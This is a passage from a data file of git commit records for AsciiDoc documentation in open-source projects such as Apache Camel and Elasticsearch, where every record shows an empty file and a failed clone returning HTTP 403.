error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c425af11669b1f43a0eb0a1ac6d7410de85e41be","subject":"Documented academic_calendar and offer_year_calendar","message":"Documented academic_calendar and offer_year_calendar\n","repos":"uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/data-manual.adoc","new_file":"doc\/data-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"a674c59b638cfcfe6814ff5b4e71c8a99da3152f","subject":"Added Zip dataformat docs to Gitbook","message":"Added Zip dataformat docs to Gitbook\n","repos":"objectiser\/camel,veithen\/camel,alvinkwekel\/camel,zregvart\/camel,sirlatrom\/camel,anton-k11\/camel,lburgazzoli\/apache-camel,Fabryprog\/camel,sabre1041\/camel,Fabryprog\/camel,christophd\/camel,anoordover\/camel,lburgazzoli\/camel,CodeSmell\/camel,acartapanis\/camel,allancth\/camel,jamesnetherton\/camel,yuruki\/camel,pax95\/camel,bgaudaen\/camel,anton-k11\/camel,davidkarlsen\/camel,ullgren\/camel,acartapanis\/camel,sverkera\/camel,tlehoux\/camel,isavin\/camel,JYBESSON\/camel,JYBESSON\/camel,davidkarlsen\/camel,JYBESSON\/camel,gnodet\/camel,nboukhed\/camel,tkopczynski\/camel,mgyongyosi\/camel,scranton\/camel,hqstevenson\/camel,veithen\/camel,nicolaferraro\/camel,tlehoux\/camel,tadayosi\/camel,yuruki\/camel,gilfernandes\/camel,dmvolod\/camel,RohanHart\/camel,yuruki\/camel,sverkera\/camel,veithen\/camel,christophd\/camel,tadayosi\/camel,acartapanis\/camel,tadayosi\/camel,ssharma\/camel,pkletsko\/camel,jkorab\/camel,JYBESSON\/camel,snurmine\/camel,objectiser\/camel,gautric\/camel,curso007\/camel,kevinearls\/camel,salikjan\/camel,nboukhed\/camel,driseley\/camel,chirino\/camel,alvinkwekel\/camel,ssharma\/camel,christophd\/camel,pmoerenhout\/camel,jonmcewen\/camel,cunningt\/camel,neoramon\/camel,pkletsko\/camel,tkopczynski\/camel,tadayosi\/camel,adessaigne\/camel,chirino\/camel,akhettar\/camel,anoordover\/camel,nikhilvibhav\/camel,isavin\/camel,pax95\/camel,kevinearls\/camel,jarst\/camel,christophd\/camel,alvinkwekel\/camel,chirino\/camel,zregvart\/camel,apache\/camel,bhaveshdt\/camel,zregvart\/camel,sabre1041\/camel,punkhorn\/camel-upstream,bhaveshdt\/camel,drsquidop\/camel,prashant2402\/camel,ssharma\/camel,dmvolod\/camel,anoordover\/camel,Thopap\/camel,cunningt\/camel,hqstevenson\/camel,pkletsko\/camel,rmarting\/camel,tadayosi\/camel,acartapanis\/camel,gnodet\/camel,driseley\/camel,snurmine\/camel,prashant2402\/camel,allancth\/camel,nicolaferraro\/camel,tdiesler\/camel,christophd\/camel,sabre1041\/camel,pkletsko\/camel,NickCis\/camel,Thopap\/camel,DariusX\/camel,akhettar\/camel,jamesnetherton\/camel,gautric\/camel,gilfernandes\/camel,jarst\/camel,anton-k11\/camel,scranton\/camel,RohanHart\/camel,mgyongyosi\/camel,lburgazzoli\/apache-camel,sverkera\/camel,snurmine\/camel,drsquidop\/camel,punkhorn\/camel-upstream,driseley\/camel,w4tson\/camel,kevinearls\/camel,apache\/camel,cunningt\/camel,gautric\/camel,tlehoux\/camel,NickCis\/camel,nboukhed\/camel,objectiser\/camel,davidkarlsen\/camel,anton-k11\/camel,mgyongyosi\/camel,Fabryprog\/camel,neoramon\/camel,gilfernandes\/camel,curso007\/camel,neoramon\/camel,tdiesler\/camel,chirino\/camel,lburgazzoli\/camel,NickCis\/camel,w4tson\/camel,gilfernandes\/camel,jonmcewen\/camel,cunningt\/camel,sirlatrom\/camel,tdiesler\/camel,tdiesler\/camel,onders86\/camel,ssharma\/camel,gnodet\/camel,jkorab\/camel,w4tson\/camel,hqstevenson\/camel,bgaudaen\/camel,mgyongyosi\/camel,jarst\/camel,driseley\/camel,prashant2402\/camel,jamesnetherton\/camel,gautric\/camel,pmoerenhout\/camel,tdiesler\/camel,mgyongyosi\/camel,sverkera\/camel,CodeSmell\/camel,nicolaferraro\/camel,scranton\/camel,Thopap\/camel,bhaveshdt\/camel,isavin\/camel,hqstevenson\/camel,DariusX\/camel,onders86\/camel,nboukhed\/camel,anoordover\/camel,kevinearls\/camel,pmoerenhout\/camel,tkopczynski\/camel,anton-k11\/camel,sabre1041\/camel,onders86\/camel,dmvolod\/camel,apache\/camel,JYBESSON\/camel,pmoerenhout\/camel,akhettar\/camel,w4tson\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,DariusX\/camel,jarst\/camel,hqstevenson\/camel,DariusX\/camel,akhettar\/camel,pax95\/camel,scranton\/camel,bhaveshdt\/camel,allancth\/camel,NickCis\/camel,bgaudaen\/camel,rmarting\/camel,ssharma\/camel,jamesnetherton\/camel,isavin\/camel,snurmine\/camel,RohanHart\/camel,ssharma\/camel,dmvolod\/camel,adessaigne\/camel,allancth\/camel,chirino\/camel,isavin\/camel,gilfernandes\/camel,allancth\/camel,anton-k11\/camel,jkorab\/camel,drsquidop\/camel,neoramon\/camel,scranton\/camel,lburgazzoli\/camel,isavin\/camel,curso007\/camel,Thopap\/camel,gnodet\/camel,RohanHart\/camel,drsquidop\/camel,RohanHart\/camel,punkhorn\/camel-upstream,sirlatrom\/camel,jonmcewen\/camel,driseley\/camel,mcollovati\/camel,adessaigne\/camel,veithen\/camel,tlehoux\/camel,jarst\/camel,onders86\/camel,lburgazzoli\/camel,JYBESSON\/camel,curso007\/camel,dmvolod\/camel,akhettar\/camel,nicolaferraro\/camel,veithen\/camel,curso007\/camel,nikhilvibhav\/camel,adessaigne\/camel,pmoerenhout\/camel,sabre1041\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,rmarting\/camel,rmarting\/camel,mgyongyosi\/camel,mcollovati\/camel,jkorab\/camel,bgaudaen\/camel,allancth\/camel,cunningt\/camel,salikjan\/camel,tkopczynski\/camel,ullgren\/camel,sirlatrom\/camel,tkopczynski\/camel,veithen\/camel,alvinkwekel\/camel,gilfernandes\/camel,sirlatrom\/camel,curso007\/camel,onders86\/camel,akhettar\/camel,neoramon\/camel,lburgazzoli\/camel,acartapanis\/camel,prashant2402\/camel,prashant2402\/camel,kevinearls\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,jonmcewen\/camel,snurmine\/camel,lburgazzoli\/camel,jkorab\/camel,pkletsko\/camel,ullgren\/camel,neoramon\/camel,NickCis\/camel,kevinearls\/camel,yuruki\/camel,jonmcewen\/camel,NickCis\/camel,chirino\/camel,nboukhed\/camel,Fabryprog\/camel,jamesnetherton\/camel,gautric\/camel,jamesnetherton\/camel,pmoerenhout\/camel,drsquidop\/camel,prashant2402\/camel,dmvolod\/camel,rmarting\/camel,yuruki\/camel,zregvart\/camel,tlehoux\/camel,gautric\/camel,scranton\/camel,mcollovati\/camel,nikhilvibhav\/camel,anoordover\/camel,tdiesler\/camel,CodeSmell\/camel,bgaudaen\/camel,ullgren\/camel,w4tson\/camel,drsquidop\/camel,cunningt\/camel,Thopap\/camel,objectiser\/camel,sabre1041\/camel,bhaveshdt\/camel,tadayosi\/camel,pax95\/camel,yuruki\/camel,mcollovati\/camel,lburgazzoli\/apache-camel,w4tson\/camel,jonmcewen\/camel,driseley\/camel,Thopap\/camel,RohanHart\/camel,apache\/camel,lburgazzoli\/apache-camel,CodeSmell\/camel,snurmine\/camel,pkletsko\/camel,jarst\/camel,nboukhed\/camel,sverkera\/camel,davidkarlsen\/camel,gnodet\/camel,bgaudaen\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,rmarting\/camel,acartapanis\/camel,tlehoux\/camel,sverkera\/camel,pax95\/camel,apache\/camel,tkopczynski\/camel,hqstevenson\/camel,christophd\/camel,onders86\/camel,adessaigne\/camel,anoordover\/camel,jkorab\/camel","old_file":"camel-core\/src\/main\/docs\/zip-dataformat.adoc","new_file":"camel-core\/src\/main\/docs\/zip-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8f95ceb21f55dd0d76acf836845ee53261fdcbb","subject":"add readme file for telegram channel","message":"add readme file for telegram channel\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"channels\/boteco-channel-telegram\/README.adoc","new_file":"channels\/boteco-channel-telegram\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b6e7ff33ea2adc2b0cfe2cf40d55296032ad31c","subject":"Fixed spelling and grammar of doc file","message":"Fixed spelling and grammar of doc file","repos":"djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f75d6bc45c28f922757f55283edaaa0c2cd6054","subject":"Worked on Security Account Manager (SAM) script","message":"Worked on Security Account Manager (SAM) script\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Security Accounts Manager keys.asciidoc","new_file":"documentation\/Security Accounts Manager keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e145fe389b66f5b6b975b4149eeda2c77bc017c0","subject":"commit","message":"commit\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"drools\/drools-jbpm\/readme.adoc","new_file":"drools\/drools-jbpm\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0aa7795fb665d8b83c28a940c7ad2692da02592","subject":"No issue. Corrected link.","message":"No issue. Corrected link.\n","repos":"webanno\/webanno,webanno\/webanno,webanno\/webanno,webanno\/webanno","old_file":"webanno-doc\/src\/main\/asciidoc\/user-guide\/annotation.adoc","new_file":"webanno-doc\/src\/main\/asciidoc\/user-guide\/annotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/webanno\/webanno.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01c212216841bfc3a3e796df2a26f61e5122cbf0","subject":"Add Gitter badge","message":"Add Gitter badge","repos":"snicoll\/initializr,gwidgets\/gwt-project-generator,bclozel\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,nevenc-pivotal\/initializr,nevenc-pivotal\/initializr,bclozel\/initializr,spring-io\/initializr,bclozel\/initializr,Arsene07\/forge,snicoll\/initializr,Arsene07\/forge,snicoll\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,bclozel\/initializr,Arsene07\/forge,gwidgets\/gwt-project-generator,gwidgets\/gwt-project-generator,gwidgets\/gwt-project-generator,spring-io\/initializr,bclozel\/initializr,spring-io\/initializr,nevenc-pivotal\/initializr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/snicoll\/initializr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fcaec4b4535ef0354d3e1e3a098a519794bd289","subject":"Create README.adoc","message":"Create README.adoc","repos":"SerCeMan\/jclouds-vsphere","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SerCeMan\/jclouds-vsphere.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d1a5488f0ec9cdc79e6e51f12117442f26c8ce0","subject":"Added a documentation section to the README","message":"Added a documentation section to the README\n","repos":"joshuagn\/ANPR,justhackit\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b66c824ce03d53e5d09d748d01c57e50d00f71d","subject":"added readme","message":"added readme\n","repos":"gAmUssA\/microservices-refcard","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gAmUssA\/microservices-refcard.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c0f1430e5ae7b9d1c81b18f53309c22766dc77","subject":"Update 2016-06-23-slack-book.adoc","message":"Update 2016-06-23-slack-book.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-06-23-slack-book.adoc","new_file":"_posts\/2016-06-23-slack-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3fb6b14fb5834ca8fd54d278ee10d05032aa6f0","subject":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"808a9852abc0a4cbcb14c1b4e7a3fc004114fd15","subject":"y2b create post YouTube Subscription Issues (Sub Box Problem)","message":"y2b create post YouTube Subscription Issues (Sub Box Problem)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-27-YouTube-Subscription-Issues-Sub-Box-Problem.adoc","new_file":"_posts\/2011-09-27-YouTube-Subscription-Issues-Sub-Box-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81e1c6664bc51440a714b577d30caa2251f30aec","subject":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","message":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2f2d8cbfab4341262dbb14d51d81d046a73860f","subject":"Update 2015-06-03-WFH-culture-and-the-virtual-office-of-science.adoc","message":"Update 2015-06-03-WFH-culture-and-the-virtual-office-of-science.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-03-WFH-culture-and-the-virtual-office-of-science.adoc","new_file":"_posts\/2015-06-03-WFH-culture-and-the-virtual-office-of-science.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ace7ce6628e6573b5dfcdcb16253e44cd98b905a","subject":"Update 2015-06-16-Using-Fluidapp-on-Mac-to-render-presentations.adoc","message":"Update 2015-06-16-Using-Fluidapp-on-Mac-to-render-presentations.adoc","repos":"ashmckenzie\/ashmckenzie.github.io,ashmckenzie\/ashmckenzie.github.io,ashmckenzie\/ashmckenzie.github.io","old_file":"_posts\/2015-06-16-Using-Fluidapp-on-Mac-to-render-presentations.adoc","new_file":"_posts\/2015-06-16-Using-Fluidapp-on-Mac-to-render-presentations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashmckenzie\/ashmckenzie.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9609ddba6084b39371af056ce69059a37933456a","subject":"Fixed RUNNING.adoc","message":"Fixed RUNNING.adoc\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"RUNNING.adoc","new_file":"RUNNING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ab7aaef461c45087409236e60575f0835bf4f00","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37f2d4faa64c3fdd0fcea7f9eef8cd3c6992fdf1","subject":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","message":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94e44c28e90ddeb4b03f0e689ecf902751e9841d","subject":"Update 2016-02-18-The-Wild-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Wild-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Wild-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Wild-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"570b3b8936bee7103d624d58355a1fd6ae46fcda","subject":"Added video about a sample debugging session","message":"Added video about a sample debugging session\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/01-introduction.adoc","new_file":"src\/sections\/01-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"359c791af9adcdefbf4eea26a0376dc6113910ce","subject":"[Add] Blog post","message":"[Add] Blog post\n","repos":"skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website","old_file":"blog\/source\/blog\/2015-08-19-0.4.5.1-rc1-released\/index.adoc","new_file":"blog\/source\/blog\/2015-08-19-0.4.5.1-rc1-released\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skybon\/rigsofrods-website.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ee8a0c265abb9c9f98cd1fc798165fc54ffb70f2","subject":"Update 2018-11-11-Go-2.adoc","message":"Update 2018-11-11-Go-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Go-2.adoc","new_file":"_posts\/2018-11-11-Go-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acfe96e9c8eb056cf0a6c1edbb8c7a96e61efa81","subject":"Update 2014-06-17-Creer-une-application-Java-avec-Neo4j-embarque.adoc","message":"Update 2014-06-17-Creer-une-application-Java-avec-Neo4j-embarque.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2014-06-17-Creer-une-application-Java-avec-Neo4j-embarque.adoc","new_file":"_posts\/2014-06-17-Creer-une-application-Java-avec-Neo4j-embarque.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1151e63fb4dca2fe624ebbaa6777f9f3da78f3e","subject":"[DOCS] updated migrate guide with info for plugins","message":"[DOCS] updated migrate guide with info for plugins\n","repos":"areek\/elasticsearch,polyfractal\/elasticsearch,jbertouch\/elasticsearch,maddin2016\/elasticsearch,zkidkid\/elasticsearch,nrkkalyan\/elasticsearch,weipinghe\/elasticsearch,mapr\/elasticsearch,snikch\/elasticsearch,rlugojr\/elasticsearch,ESamir\/elasticsearch,pozhidaevak\/elasticsearch,drewr\/elasticsearch,awislowski\/elasticsearch,JackyMai\/elasticsearch,hafkensite\/elasticsearch,myelin\/elasticsearch,cwurm\/elasticsearch,jpountz\/elasticsearch,lks21c\/elasticsearch,Rygbee\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,diendt\/elasticsearch,elasticdog\/elasticsearch,F0lha\/elasticsearch,drewr\/elasticsearch,ivansun1010\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,caengcjd\/elasticsearch,maddin2016\/elasticsearch,socialrank\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,socialrank\/elasticsearch,coding0011\/elasticsearch,Collaborne\/elasticsearch,nrkkalyan\/elasticsearch,rajanm\/elasticsearch,myelin\/elasticsearch,davidvgalbraith\/elasticsearch,mortonsykes\/elasticsearch,i-am-Nathan\/elasticsearch,sneivandt\/elasticsearch,weipinghe\/elasticsearch,zkidkid\/elasticsearch,trangvh\/elasticsearch,kunallimaye\/elasticsearch,umeshdangat\/elasticsearch,alexshadow007\/elasticsearch,andrejserafim\/elasticsearch,PhaedrusTheGreek\/elasticsearch,dongjoon-hyun\/elasticsearch,dongjoon-hyun\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,artnowo\/elasticsearch,xuzha\/elasticsearch,jpountz\/elasticsearch,ESamir\/elasticsearch,JackyMai\/elasticsearch,nazarewk\/elasticsearch,winstonewert\/elasticsearch,fernandozhu\/elasticsearch,masterweb121\/elasticsearch,scorpionvicky\/elasticsearch,andrestc\/elasticsearch,jbertouch\/elasticsearch,AndreKR\/elasticsearch,hafkensite\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,drewr\/elasticsearch,cnfire\/elasticsearch-1,nazarewk\/elasticsearch,qwerty4030\/elasticsearch,avikurapati\/elasticsearch,brandonkearby\/elasticsearch,Shepard1212\/elasticsearch,socialrank\/elasticsearch,alexshadow007\/elasticsearch,mmaracic\/elasticsearch,Collaborne\/elasticsearch,ricardocerq\/elasticsearch,ESamir\/elasticsearch,nrkkalyan\/elasticsearch,masterweb121\/elasticsearch,ivansun1010\/elasticsearch,alexshadow007\/elasticsearch,naveenhooda2000\/elasticsearch,camilojd\/elasticsearch,karthikjaps\/elasticsearch,karthikjaps\/elasticsearch,masaruh\/elasticsearch,AndreKR\/elasticsearch,schonfeld\/elasticsearch,jbertouch\/elasticsearch,Stacey-Gammon\/elasticsearch,schonfeld\/elasticsearch,C-Bish\/elasticsearch,YosuaMichael\/elasticsearch,yanjunh\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,areek\/elasticsearch,diendt\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,camilojd\/elasticsearch,clintongormley\/elasticsearch,areek\/elasticsearch,LeoYao\/elasticsearch,sreeramjayan\/elasticsearch,sdauletau\/elasticsearch,mmaracic\/elasticsearch,JervyShi\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,petabytedata\/elasticsearch,obourgain\/elasticsearch,Rygbee\/elasticsearch,jeteve\/elasticsearch,brandonkearby\/elasticsearch,Collaborne\/elasticsearch,JSCooke\/elasticsearch,lzo\/elasticsearch-1,rajanm\/elasticsearch,xuzha\/elasticsearch,F0lha\/elasticsearch,MaineC\/elasticsearch,wuranbo\/elasticsearch,drewr\/elasticsearch,sreeramjayan\/elasticsearch,henakamaMSFT\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,JSCooke\/elasticsearch,YosuaMichael\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,glefloch\/elasticsearch,JervyShi\/elasticsearch,wuranbo\/elasticsearch,rmuir\/elasticsearch,wbowling\/elasticsearch,weipinghe\/elasticsearch,kaneshin\/elasticsearch,diendt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,IanvsPoplicola\/elasticsearch,henakamaMSFT\/elasticsearch,PhaedrusTheGreek\/elasticsearch,andrestc\/elasticsearch,jchampion\/elasticsearch,dongjoon-hyun\/elasticsearch,F0lha\/elasticsearch,dpursehouse\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,GlenRSmith\/elasticsearch,polyfractal\/elasticsearch,bawse\/elasticsearch,naveenhooda2000\/elasticsearch,Rygbee\/elasticsearch,rmuir\/elasticsearch,rlugojr\/elasticsearch,fred84\/elasticsearch,lzo\/elasticsearch-1,strapdata\/elassandra5-rc,coding0011\/elasticsearch,coding0011\/elasticsearch,spiegela\/elasticsearch,mmaracic\/elasticsearch,rmuir\/elasticsearch,liweinan0423\/elasticsearch,onegambler\/elasticsearch,kaneshin\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,weipinghe\/elasticsearch,avikurapati\/elasticsearch,mikemccand\/elasticsearch,Collaborne\/elasticsearch,mapr\/elasticsearch,AndreKR\/elasticsearch,gmarz\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,sreeramjayan\/elasticsearch,MisterAndersen\/elasticsearch,gmarz\/elasticsearch,jchampion\/elasticsearch,palecur\/elasticsearch,weipinghe\/elasticsearch,cnfire\/elasticsearch-1,iacdingping\/elasticsearch,tebriel\/elasticsearch,ESamir\/elasticsearch,scorpionvicky\/elasticsearch,jeteve\/elasticsearch,andrestc\/elasticsearch,socialrank\/elasticsearch,sneivandt\/elasticsearch,tebriel\/elasticsearch,markharwood\/elasticsearch,masterweb121\/elasticsearch,rajanm\/elasticsearch,palecur\/elasticsearch,PhaedrusTheGreek\/elasticsearch,dpursehouse\/elasticsearch,cnfire\/elasticsearch-1,jprante\/elasticsearch,wbowling\/elasticsearch,jchampion\/elasticsearch,rajanm\/elasticsearch,cnfire\/elasticsearch-1,yynil\/elasticsearch,kalburgimanjunath\/elasticsearch,mikemccand\/elasticsearch,yynil\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,xingguang2013\/elasticsearch,wenpos\/elasticsearch,elasticdog\/elasticsearch,jchampion\/elasticsearch,C-Bish\/elasticsearch,wenpos\/elasticsearch,yanjunh\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra5-rc,JackyMai\/